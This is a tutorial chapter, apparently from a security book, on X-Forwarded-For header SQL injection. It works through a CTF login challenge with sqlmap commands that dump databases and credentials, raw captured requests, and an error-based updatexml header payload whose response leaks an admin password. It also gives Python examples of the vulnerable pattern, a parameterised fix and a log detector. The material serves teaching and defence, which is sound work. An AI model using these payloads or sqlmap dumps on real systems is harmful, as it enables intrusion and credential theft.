3.5 Using sqlmap for X-Forwarded-For header injection
3.5.1 Introduction to X-Forwarded-For injection
1. X-Forwarded-For overview
X-Forwarded-For, abbreviated XFF, identifies the client, i.e. the real IP address of the HTTP requester. It is only added when the request passes through an HTTP proxy or load balancer. It is not a standard request header defined in an RFC; a detailed description can be found in the public documentation of the Squid caching proxy.
Standard format: X-Forwarded-For: client1, proxy1, proxy2
Reference: https://blog.csdn.net/zyhmz/article/details/82505344
2. Vulnerability analysis
(1) The username, password and login IP address are queried from the table
(2) The login variables are validated with the sanitize() function
(3) The IP address is obtained with the ip_adr() method
(4) HTTP_X_FORWARDED_FOR SQL injection
Reference: https://blog.csdn.net/xiao__gui/article/details/83054462
Summary: the X-Forwarded-For header injection arises because a client-supplied value is passed to the backend and used in a database interaction without any validation of its characters. For example, when a client logs in with a forged IP address in X-Forwarded-For, the backend records that address and writes it to the database; since nothing filters the input along the way, arbitrary SQL can be executed.
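The analysis above (steps (3) and (4)) describes the header value travelling from ip_adr() straight into a query. The following is an added example, not the CTF target's source or the referenced post's code: it rebuilds that pattern as a hypothetical login-log writer on an in-memory SQLite database (the real target runs MySQL, so the MySQL-only updatexml() part of the page's payload is omitted), reproduces the single-quote probe from the write-up, and places the hardened version beside it. Table, function and parameter names, the remote_addr argument and the sample addresses are all constructed for the example.

```python
import ipaddress
import sqlite3

# Constructed stand-in for the login table of the "webcalendar" database named on the page.
SCHEMA = "CREATE TABLE login_log (id INTEGER PRIMARY KEY, username TEXT, ip TEXT)"


def new_db():
    """Fresh in-memory SQLite database (assumption: the page's target uses MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def record_login_vulnerable(conn, username, xff_header):
    """Hypothetical version of the flawed pattern: the X-Forwarded-For value is
    spliced into the INSERT by string formatting, so a quote in the header
    changes the statement instead of being stored as data."""
    sql = "INSERT INTO login_log (username, ip) VALUES ('%s', '%s')" % (username, xff_header)
    conn.execute(sql)
    conn.commit()


def single_quote_breaks_vulnerable():
    """Reproduces the probe from the write-up: one stray quote causes a database error."""
    conn = new_db()
    try:
        record_login_vulnerable(conn, "a", "2.3.4.5'")
    except sqlite3.OperationalError:
        return True
    return False


def client_ip_from_xff(xff_header, remote_addr):
    """Strict input control: the header must be a comma-separated list of IP
    literals ("client1, proxy1, proxy2"). Anything else is discarded and the
    TCP peer address is used. Validation guarantees only that the value is an
    address; the leftmost hop is still whatever the client chose to send."""
    if not xff_header:
        return remote_addr
    hops = [hop.strip() for hop in xff_header.split(",")]
    try:
        for hop in hops:
            ipaddress.ip_address(hop)  # ValueError for anything that is not an IP literal
    except ValueError:
        return remote_addr
    return hops[0]


def record_login_hardened(conn, username, xff_header, remote_addr):
    """Validated value plus a parameterised statement: the header can never
    alter the SQL, whatever it contains."""
    ip = client_ip_from_xff(xff_header, remote_addr)
    conn.execute("INSERT INTO login_log (username, ip) VALUES (?, ?)", (username, ip))
    conn.commit()
    return ip


def logged_rows(conn):
    return conn.execute("SELECT username, ip FROM login_log ORDER BY id").fetchall()


def demo():
    """Same header shape as the page's payload, minus the MySQL-only updatexml() call."""
    payload = "2.3.4.5' or '1'='1"
    vuln = new_db()
    record_login_vulnerable(vuln, "a", payload)  # stores the result of an OR expression, not an IP
    safe = new_db()
    record_login_hardened(safe, "a", payload, "203.0.113.7")  # header rejected, peer address kept
    record_login_hardened(safe, "b", "2.3.3.3, 10.0.0.1", "203.0.113.7")  # well-formed list accepted
    return logged_rows(vuln), logged_rows(safe)


if __name__ == "__main__":
    print(single_quote_breaks_vulnerable(), demo())
```

In the vulnerable path the recorded "IP" for user a is the text '1', because the header was evaluated as an SQL expression; in the hardened path the same header is discarded and the connection's own peer address is logged, while a well-formed client/proxy list is accepted unchanged.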
3. SQL injection testing
(1) Manual injection is not demonstrated here; SQL injection will be covered later in a dedicated series working through sqli-labs, so for now this book focuses mainly on the sqlmap tool.
(2) The author of the referenced post mentions capturing the request and injecting with sqlmap:
sqlmap.py -r bmfx.txt --tamper=xforwardedfor.py -v 3
3.5.2 X-Forwarded-For CTF injection walkthrough
1. CTF challenge
The CTF challenge here is taken directly from Mozhe Academy; the site is:
https://www.mozhe.cn (an account must be registered to play)
The corresponding X-Forwarded-For injection challenge:
https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
Start the target environment and visit it as instructed.
Start Burp Suite, set its proxy to port 8080, and browse to the target http://219.153.49.228:44549
It turns out to be a login form. Enter admin/admin to log in, forward the captured request from Burp Suite to Repeater, then add an X-Forwarded-For header for testing.
Dropping in a single quote triggers a MySQL database error, which indicates a SQL injection vulnerability; sqlmap can then be run as follows:
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" --dbs
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar --tables
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar -T user --columns
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar -T user -C username,password --dump
Captured request saved as bmfx.txt:
POST /index.php HTTP/1.1
Host: 219.153.49.228:44549
Content-Length: 21
Cache-Control: max-age=0
Origin: http://219.153.49.228:44549
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://219.153.49.228:44549/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: 2.3.3.3
username=a&password=a
==========================================================================================================
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" --level 3 -D webcalendar -T user -C id,username,password --dump
Second captured request, with * marking the injection point for sqlmap:
POST /index.php HTTP/1.1
Referer: http://219.153.49.228:41635/index.php
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Accept-Encoding: gzip, deflate
Content-Length: 28
Host: 219.153.49.228:41635
Connection: close
X-Forwarded-For: *
username=admin&password=ssss
============================================================================================================
One-step extraction: an error-based payload in the header returns the credentials directly
POST /index.php HTTP/1.1
Host: 219.153.49.228:44549
Content-Length: 21
Cache-Control: max-age=0
Origin: http://219.153.49.228:44549
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://219.153.49.228:44549/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: 2.3.4.5' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from user),0x7e),1) or '1'='1
username=a&password=a
HTTP/1.1 200 OK
Date: Tue, 16 Jun 2020 09:30:02 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 39
Connection: close
Content-Type: text/html
XPATH syntax error: '~admin~568328384~'
The above obtains the account and password directly in a single step.
=======================================================================================================
References:
https://galiyy.github.io/2019/08/28/CTF%E9%9D%B6%E5%9C%BA%E8%AE%AD%E7%BB%83-SQL%E6%B3%A8%E5%85%A5%EF%BC%88X-Forwarded-For%E6%B3%A8%E5%85%A5%EF%BC%89/
3.5.3 Summary and mitigation
1. Summary of X-Forwarded-For exploitation
(1) Judge from the page's response: if it involves an IP address, an X-Forwarded-For injection is quite likely present.
(2) Capture the page request with Burp Suite and save it.
(3) Run the SQL injection test with sqlmap:
sqlmap.py -r bmfx.txt -p "X-Forwarded-For"
The X-Forwarded-For value in the saved request must be a * or an IP address, otherwise the injection will not be found.
2. Defending against X-Forwarded-For injection
Always filter values before they are used in a query statement and strictly control parameter input.
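Besides filtering on the application side, the summary's own observation cuts both ways for a defender: a legitimate X-Forwarded-For is only ever a list of addresses, so anything else in that header is a signal. The following is an added example, not part of the original page or the CTF platform, that runs that check over constructed access-log lines. It assumes the web server logs the header as a final quoted field appended to the Apache combined format ("%{X-Forwarded-For}i"); the log lines, addresses and timestamps are constructed for the example.

```python
import ipaddress
import re

# Constructed sample lines: Apache combined log format with "%{X-Forwarded-For}i" appended as a
# final quoted field (an assumed logging configuration, not something the page describes).
SAMPLE_LOG = """\
203.0.113.9 - - [16/Jun/2020:09:30:01 +0000] "POST /index.php HTTP/1.1" 200 39 "-" "Mozilla/5.0" "2.3.3.3"
203.0.113.9 - - [16/Jun/2020:09:30:02 +0000] "POST /index.php HTTP/1.1" 200 39 "-" "Mozilla/5.0" "2.3.3.3, 10.0.0.1"
203.0.113.9 - - [16/Jun/2020:09:30:03 +0000] "POST /index.php HTTP/1.1" 200 39 "-" "Mozilla/5.0" "2.3.4.5'"
203.0.113.9 - - [16/Jun/2020:09:30:04 +0000] "POST /index.php HTTP/1.1" 200 39 "-" "Mozilla/5.0" "2.3.4.5' or '1'='1"
198.51.100.4 - - [16/Jun/2020:09:30:05 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "-"
"""

# One combined-format line; the header value is the last quoted field.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)


def is_well_formed_xff(value):
    """'-' means the header was absent; otherwise every comma-separated hop must be an IP literal.
    A lone '*' (the marker sqlmap uses for the injection point) therefore also fails."""
    if value == "-":
        return True
    try:
        for hop in value.split(","):
            ipaddress.ip_address(hop.strip())
    except ValueError:
        return False
    return True


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def suspicious_xff_events(log_text):
    """Return one finding per request whose X-Forwarded-For is not an address list."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or is_well_formed_xff(rec["xff"]):
            continue
        findings.append({
            "ts": rec["ts"],
            "src": rec["src"],
            "path": rec["req"].split(" ")[1],
            "xff": rec["xff"],
        })
    return findings


def findings_by_source(findings):
    """Count malformed-header requests per TCP peer; a burst from one peer is the automated-scan pattern."""
    counts = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    events = suspicious_xff_events(SAMPLE_LOG)
    for e in events:
        print(e)
    print(findings_by_source(events))
```

Of the five constructed lines, only the two carrying a quote in the header are reported, both from the same peer. Header values that contain a double quote would be escaped by the web server and are not handled by the simple regex here; for production use, feed the parsed field from the log pipeline instead.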